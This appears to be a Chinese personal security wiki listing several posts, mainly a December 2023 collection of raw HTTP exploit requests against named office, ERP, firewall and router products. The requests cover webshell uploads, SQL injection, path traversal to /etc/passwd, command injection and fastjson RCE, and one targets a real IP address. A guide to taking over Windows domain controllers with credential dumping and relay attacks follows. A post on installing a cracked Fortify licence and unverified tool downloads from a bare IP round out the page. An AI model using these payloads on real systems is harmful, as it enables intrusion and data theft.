Yueying's wiki (月影的wiki)
Search results: 85 articles
2023-12-11
December vulnerability intelligence
Arbitrary file upload in all Suda (速达) software products

    POST /report/DesignReportSave.jsp?report=../625248.jsp HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
    Accept-Encoding: gzip, deflate
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Connection: close
    Host: 127.0.0.1
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Upgrade-Insecure-Requests: 1
    Content-Type: application/octet-stream
    Content-Length: 28

    <% out.print("984969719");%>

SQL injection in Hongfan (红帆) iOffice ioAssistance2.asmx

    POST /ioffice/prg/set/wss/ioAssistance2.asmx HTTP/1.1
    Host:
    Content-Type: text/xml; charset=utf-8
    Soapaction: "http://tempuri.org/GetLoginedEmpNoReadedInf"
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

    <?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
      <soap:Body>
        <GetLoginedEmpNoReadedInf xmlns="http://tempuri.org/">
          <sql>select host_name()</sql>
        </GetLoginedEmpNoReadedInf>
      </soap:Body>
    </soap:Envelope>

Arbitrary file upload via the wpsservlet interface of the Wanhu (万户) ezOFFICE collaborative office platform

    POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=40067&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
    Accept-Encoding: gzip, deflate
    Accept: */*
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 176
    Content-Type: multipart/form-data; boundary=55aeb894de1521afe560c924fad7c6fb

    --55aeb894de1521afe560c924fad7c6fb
    Content-Disposition: form-data; name="NewFile"; filename="40067.jsp"

    <% out.print("797276100");%>
    --55aeb894de1521afe560c924fad7c6fb--

Remote command execution in Honeywell products (CVE-2023-3710)

    POST /loadfile.lp?pageid=Configure HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
    Connection: close
    Content-Length: 56
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate

    username=x%0aid;pwd;cat+/etc/*-release%0a&userpassword=1

Code execution via request_uri in Yunyou CMS (云优cms)

    GET /index.php?s=wap/index/index&asdasd=aa";print_r(md5(12356));exit;?> HTTP/1.1
    Host:
    User-Agent: Mozilla/5.0

Command execution in security products from multiple vendors

    GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls

File upload via gpy in the Yunshikong (云时空) social commerce ERP system

    POST /servlet/fileupload/gpy HTTP/1.1
    Host:IP
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=4eea98d02AEa93f60ea08dE3C18A1388
    Content-Length: 215

    --4eea98d02AEa93f60ea08dE3C18A1388
    Content-Disposition: form-data; name="file1"; filename="2.jsp"
    Content-Type: application/octet-stream

    <% out.println("hello flnb"); %>
    --4eea98d02AEa93f60ea08dE3C18A1388--

ownCloud sensitive information disclosure (CVE-2023-49103)

When the URL contains the /owncloud/ path, that prefix must be kept:

    /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php
    /owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php

Arbitrary file read in the RuoYi (若依) management system, CNVD-2021-15555

    GET /common/download/resource?resource=/profile/../../../../../../../../../../etc/passwd HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
    Accept: */*
    Connection: Keep-Alive

Arbitrary file upload in Tongweb selectApp.jsp

    POST /heimdall/pages/cla/selectApp.jsp HTTP/1.1
    Host:
    Content-Type: multipart/form-data; boundary=fa2ef860e94d564632e291131d20064c
    User-Agent: Mozilla/5.0

    --fa2ef860e94d564632e291131d20064c
    Content-Disposition: form-data; name="app_fileName"

    Li4vLi4vYXBwbGljYXRpb25zL2hlaW1kYWxsLzEyM3F3ZTEuanNw
    --fa2ef860e94d564632e291131d20064c
    Content-Disposition: form-data; name="app"

    --fa2ef860e94d564632e291131d20064c
    Content-Disposition: form-data; name="className"

    test
    --fa2ef860e94d564632e291131d20064c
    Content-Disposition: form-data; name="uploadApp"; filename="test.jar"
    Content-Type: application/java-archive

    <% out.println(16156223+223415616); %>
    --fa2ef860e94d564632e291131d20064c--

Yunanbao Yunxiazi (云安宝-云匣子) config fastjson RCE

    POST /3.0/authService/config HTTP/2
    Host: XXXX
    Accept: application/json, text/plain, */*
    Content-Type: application/json;charset=UTF-8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123 Safari/537.36
    Referer: https://XXXX/
    Cmd: echo 7dgdggddg
    Accept-Encoding: gzip, deflate, br
    Accept-Language: zh-CN,zh;q=0.9
    Priority: u=1, i
    Content-Length: 18907

    {"a":{"@type":"java.lang.Class","val": "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"},"b":{"@type": "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource","userOverridesAsString":"HexAsciiSerializedMap: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;"}}

Authentication bypass in the setup.cgi interface of the NETGEAR DGND3700v2 router

    GET /setup.cgi?next_file=passwordrecovered.htm&foo=currentsetting.htm

Login bypass in the authManageSet.cgi interface of Wangshen (网神) SecGate3600

    POST /cgi-bin/authUser/authManageSet.cgi HTTP/1.1
    Host:
    Content-Type: application/x-www-form-urlencoded
    Cookie: sw_login_name=admin
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

    type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc

Arbitrary file upload via app_av_import_save in the Wangshen (网神) SecGate 3600 firewall

    POST /?g=app_av_import_save HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
    Cache-Control: no-cache
    Pragma: no-cache
    Host: 218.60.144.129
    Content-Length: 536

    ------WebKitFormBoundaryJpMyThWnAxbcBBQc
    Content-Disposition: form-data; name="MAX_FILE_SIZE"

    10000000
    ------WebKitFormBoundaryJpMyThWnAxbcBBQc
    Content-Disposition: form-data; name="upfile"; filename="test.txt"
    Content-Type: text/plain

    test
    ------WebKitFormBoundaryJpMyThWnAxbcBBQc
    Content-Disposition: form-data; name="submit_post"

    obj_app_upfile
    ------WebKitFormBoundaryJpMyThWnAxbcBBQc
    Content-Disposition: form-data; name="__hash__"

    0b9d6b1ab7479ab69d9f71b05e0e9445
    ------WebKitFormBoundaryJpMyThWnAxbcBBQc--
2023-12-07
Code audit and analysis tool Fortify-2023
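Introduction

Fortify provides static and dynamic application security testing, as well as runtime application monitoring and protection. For efficient security testing, Fortify offers source code security analysis that pinpoints the path along which a vulnerability arises, with a scan speed of 10,000 lines per minute. Fortify SCA supports a wide range of development environments, languages, platforms and frameworks, and can run security checks on mixed development and production environments.

27 programming languages
More than 911,000 component-level APIs
Detects more than 961 vulnerability categories
Supports all major platforms, build environments and IDEs

Developer-friendly language coverage: ABAP/BSP, ActionScript, Apex, ASP.NET, C# (.NET), C/C++, Classic ASP (including VBScript), COBOL, ColdFusion CFML, Go, HTML, Java (including Android), JavaScript/AJAX, JSP, Kotlin, MXML (Flex), Objective C/C++, PHP, PL/SQL, Python, Ruby, Swift, T-SQL, VB.NET, VBScript, Visual Basic and XML
Supported IDEs: Eclipse, IntelliJ Ultimate, IntelliJ Community Android Studio, IBM Rational Application Developer, IBM Rational Software Architect, Microsoft Visual Studio
Supported build tools: Ant, Jenkins, Maven, MSBuild, Xcodebuild
Supported defect management platforms: Jira, ALM, Bugzilla
Supported source control tools: Git, SVN, TFS

Vulnerability coverage includes more than 1000 SAST vulnerability categories, to ensure compliance with standards such as OWASP Top 10, CWE/SANS Top 25, DISA STIG and PCI DSS.

The Fortify Static Code Analyzer installer no longer includes the Fortify Static Code Analyzer applications and tools. A separate installer is provided for the Fortify Static Code Analyzer applications and tools.

1. Installation steps:

Step 1. Unpack the patch archive and place fortify.license, Fortify_SCA_23.1.0_windows_x64.exe and Fortify_Apps_and_Tools_23.1.0_windows_x64.exe in the same directory; the path must not contain Chinese characters.
Step 2. Install Fortify_SCA_23.1.0_windows_x64.exe; the installer finds the fortify.license license file automatically.
Step 3. Install Fortify_Apps_and_Tools_23.1.0_windows_x64.exe; the installer finds the fortify.license license file automatically.
Step 4. Copy fortify-common-23.1.0.0028.jar into both C:\Program Files\Fortify\Fortify_SCA_23.1.0\Core\lib\ and C:\Program Files\Fortify\Fortify_Apps_and_Tools_23.1.0\Core\lib\, overwriting the original file.
Step 5. Unpack the rule library FortifyRules_zh_CH_2023.1.1.0001(离线规则库).zip (offline rule library) and copy the ExternalMetadata and rules folders into C:\Program Files\Fortify\Fortify_SCA_23.1.0\Core\config.
Step 6. Run auditworkbench.cmd under C:\Program Files\Fortify\Fortify_Apps_and_Tools_23.1.0\bin to open the GUI.
Step 7. Configure scans as needed.

2. Rule library

The rule library cannot be upgraded directly on the local machine; use the offline upgrade and the latest Chinese and English rule libraries.

Download link: visible after replying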
2023-11-11
Common approaches to attacking Windows domain controllers
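0x1 Preface

I recently reviewed some Active Directory domain knowledge, and while looking things up I found there is a lot more material than a few years ago; the subject is becoming more and more transparent. So here is a summary of the common ways of taking a domain controller, all of them commonly used in real engagements. Each method is followed by links to real-world write-ups or reference articles. When studying, get clear on the principle of each vulnerability and the conditions it requires; then, in a real environment, combine that with the information you have collected. That is how you arrive at a correct and clear attack path.

0x2 Common ways of taking a domain controller

2.1 Highly exploitable domain controller vulnerabilities

Go straight in with the Zerologon, NoPac or PrintNightmare vulnerabilities; with very good luck MS17-010 and MS14-068 may work as well. Beyond that, get clear on each vulnerability's exploitation conditions and principle; there are plenty of articles online on the exploitation process itself.

MS14-068 real-world article: https://mp.weixin.qq.com/s/rS-LAAjPI-k0-n_HxlSt9w
MS17-010 real-world article: https://mp.weixin.qq.com/s/KzghydvJtaFyPOrNanosAg
Zerologon real-world article: https://mp.weixin.qq.com/s/pBwIpBx7nJ9wu9R7YJR3xg
NoPac real-world article: https://mp.weixin.qq.com/s/TLloZlFt-fkxg1pGMk9aQ
PrintNightmare real-world article: https://mp.weixin.qq.com/s/LrEKrSJiT5zNGahUrFWPFg

2.2 Dumping credentials or injecting into a domain administrator process

Check whether a domain administrator process is running. If not, try password spraying or other vulnerabilities and move laterally to as many machines as possible; if there is one, inject into the domain administrator process.

Real-world article: https://mp.weixin.qq.com/s/LrEKrSJiT5zNGahUrFWPFg

Dump credentials and check whether they include domain administrator credentials; if not, try password spraying or other vulnerabilities, again moving laterally to as many machines as possible.

Real-world article: https://mp.weixin.qq.com/s/gYiBDA14RDQUl1eka_WwIw

BloodHound makes this easier to visualise.

2.3 Unconstrained delegation host combined with the printer bug

If the machine obtained has been configured by the domain administrator for unconstrained delegation, we can act on behalf of any user in the domain to access any service (for example the domain controller's CIFS service), provided that the target user has sent us a Kerberos request. Coerced-authentication vulnerabilities such as PrintBug or PetitPotam can be used to make that happen.

Reference article: https://mp.weixin.qq.com/s/MRtQG6O2eRVczZojJYCw7g
Real-world article: https://mp.weixin.qq.com/s/BgBMs1QNP35riA6ZsorZSA

2.4 CVE-2019-1040

This is generally done by combining CVE-2019-1040 with coerced authentication to perform an NTLM relay, together with RBCD, ACLs and so on, against the domain controller, Exchange and similar targets. This part involves quite a lot of knowledge, and I crammed on it this time as well.

Reference articles:
https://mp.weixin.qq.com/s/bbquXVj24j3jbZNs2XZ_YA
https://mp.weixin.qq.com/s/T55i1FqTonG1aIq9Bcj7VQ
https://mp.weixin.qq.com/s/cnQGg0S9Py7Ix6M9CAqKbg

2.5 Exchange vulnerabilities

Exploit vulnerabilities such as ProxyShell, ProxyNotShell, ProxyLogon, CVE-2021-26857 or PrivExchange to gain control of the Exchange server. Once Exchange privileges are obtained, membership of a special group gives it the WriteDACL right, so it can modify ACLs in the domain and grant the DCSync ACE rights to a chosen user. That allows the user to impersonate a domain controller and request the hashes of domain accounts, including the domain administrator's hash, and finally to take control of the domain controller.

Real-world articles:
https://mp.weixin.qq.com/s/Uufa1SabEU2ndJ3Lt5Boig
https://mp.weixin.qq.com/s/sjlBpVjobkSKd_Uf0J_u2A
https://mp.weixin.qq.com/s/O6a40449vTKWUXS4kwD9xA

2.6 ADCS vulnerabilities

ADCS Relay: if there is an ADCS service on the internal network and certificate Web enrollment is enabled, the attacker only needs one domain account, combined with a coerced-authentication vulnerability such as PetitPotam or PrintBug. CVE-2019-1040 is not needed here because this is a relay to HTTP. The NTLM relay yields the DC's Base64 certificate, asktgt is used to obtain a TGT, and the TGT is injected and combined with DCSync to gain control of the domain controller.

Reference articles:
https://mp.weixin.qq.com/s/lzBoMZfAXVR0Dj_ogO7oPA
https://mp.weixin.qq.com/s/0s8BptnL8eWZr5k5fM0vxA
Real-world article: https://mp.weixin.qq.com/s/NSirkRa4w1RSjigpTsIcSw

ESC series: as far as I can see this currently runs from ESC1 to ESC11. The ADCS Relay mentioned above is ESC8; for the rest, see the reference articles below.

Reference articles:
https://mp.weixin.qq.com/s/aVURmXz8sTe56KBfyPutEw
https://mp.weixin.qq.com/s/bqdI41850hUkAH89ofSMJw
https://mp.weixin.qq.com/s/-qv0VbudiKr5QhD14b013Q
https://mp.weixin.qq.com/s/bEoaWGp19z3P_CpolHxziA

CVE-2022-26923: this vulnerability follows the NoPac exploitation idea, moving the Kerberos authentication problem in NoPac over to certificate authentication. It works by changing the value of a machine account's dNSHostName attribute to match the domain controller's, which yields the domain controller's machine account hash and therefore control of the domain controller.

Reference articles:
https://mp.weixin.qq.com/s/3DZPkG4Z9w8xbVKvW64Mgw
https://mp.weixin.qq.com/s/ctpRXyhP7Zl9siAsh9Lsxw
Real-world article: https://mp.weixin.qq.com/s/NSirkRa4w1RSjigpTsIcSw

2.7 ACL abuse

BloodHound can be used to analyse ACL control paths and find exploitable rights. For example, if user A has WriteDACL over user B, A can change its rights over B to GenericAll, giving A full access control over B. This can also be combined with GPO abuse to add user rights, add a local administrator, add a new computer startup script and so on. A classic case of ACL abuse is gaining Exchange privileges through a vulnerability: membership of a special group gives it the WriteDACL right, so it can modify ACLs in the domain and grant the DCSync ACE rights to a chosen user.

Reference articles:
https://mp.weixin.qq.com/s/YCf-0FiqFfQ7WW0V5JR7jA
https://mp.weixin.qq.com/s/mOVJ21KSArqsoAcV7piUxQ
https://mp.weixin.qq.com/s/XhbsSyDDV774LJ4o2QkSBw
Real-world article: https://mp.weixin.qq.com/s/r_bwyX2qj5VSqf3mVrnqGg

2.8 Pre-Authentication && AS-REP Roasting && Kerberoasting

These all target domain accounts: user enumeration or offline cracking.

Reference article: https://mp.weixin.qq.com/s/TH2BbrEj0X_1r2UkDD75vw

0x3 Recommended real-world articles

A few real-world write-ups that show a lot of reasoning and attempts (careful reading recommended):
https://mp.weixin.qq.com/s/Iup2hZdPADFGDSi2AXP_Pg
https://mp.weixin.qq.com/s/bDH5LYjSPRtxUi1aGNpgSw
https://mp.weixin.qq.com/s/tdPfi4y9vxvJAA2bR_VCcg
https://mp.weixin.qq.com/s/NSirkRa4w1RSjigpTsIcSw
https://mp.weixin.qq.com/s/z_jc0_HLqeRSCtLMG8NpEg
https://mp.weixin.qq.com/s/8OueE-bEIdkvwPWu3KqrcQ

0x4 Summary

In a real environment you still have to build an effective attack route from the information you have collected. The "Recommended real-world articles" are worth reading carefully: they use many of these techniques, and the thinking process is shown as well.

For example, the first of the recommended articles is based on RBCD. LDAP information was exported with ADFind or LDAPsearch, and the SID in each machine account's mS-DS-CreatorSID attribute was compared with the objectSid values of user accounts. This showed that one user had joined quite a few machines to the domain, so the user was presumed to be operations staff. That user was taken over through spear phishing and, combined with RBCD, this gave control of one domain machine. A CS beacon was then brought online for information gathering, which found 3389 connection records; after extracting them, the author logged in to a web server and found that the database it connected to was the only MSSQL service in the domain with an SPN registered. RottenTomato was then used to escalate from SERVICE to SYSTEM, a domain administrator process was found, and with that the domain controller was taken.

The second of the recommended articles used BloodHound to collect information in the domain and found that the domain user PO of m.child.xiaoli was also in the AS group (Enterprise Admins) of child.xiaoli. Searching for the shortest path to the child domain controller then showed that the current user ra was in the SN group, which had administrator rights on host PGO, and that host PGO had a session of a user named PGO with child domain controller administrator rights, so the child domain controller was taken directly. On the child domain, BloodHound analysis of the current PGO user showed that PGO was in the Administrators group and held the GetChangesAll and GetChanges DCSync rights, so the credentials of user PO (Enterprise Admins) could be obtained directly, and with them the forest. The article shows the concrete thinking process and several methods, and is worth reading in detail.

The sixth of the recommended articles starts from a WEBDAV XXE to perform an NTLM relay combined with RBCD. RBCD needs a machine account, so the usernames from a previously obtained discuz database were compiled into a dictionary, and AS_REQ responses were used to determine whether each username existed. The discuz passwords were then batch-decrypted on cmd5, which showed that most users' login password was P@ssw0rd, so password spraying was used and one domain credential was obtained. With the domain credential, the author connected to the domain controller's LDAP to add a machine account, requested an ST through S4U to log in to the WEBDAV server, and finally used ssp against lsass to bypass Kaspersky and dump the domain administrator hash, taking the domain controller.

Finally, do the information gathering inside the domain well. Also collect things you find such as address books and operations password notebooks; sometimes they play a key role in taking the domain controller.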
2023-09-20
The Nine Purple Li Fire period: fellow Daoist, make sure you catch this immense fortune!
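Timing is the talent scout and the opportunity on the road to success; favourable terrain is the environment and the conditions on the road to success; harmony among people is the overall strength on the road to success. So in the often-mentioned "Nine Purple Li Fire period" (九紫离火运), what kind of timing and terrain will we have?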
2023-09-20
Data recovery tools
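Free data recovery tools that I spent a fortune collecting, for recovering accidentally deleted files from computer hard disks, USB drives and so on. Note: do not save the recovered files onto the original disk, otherwise it may crash. Link: http://47.100.127.167/usr/uploads/tools/restore.rar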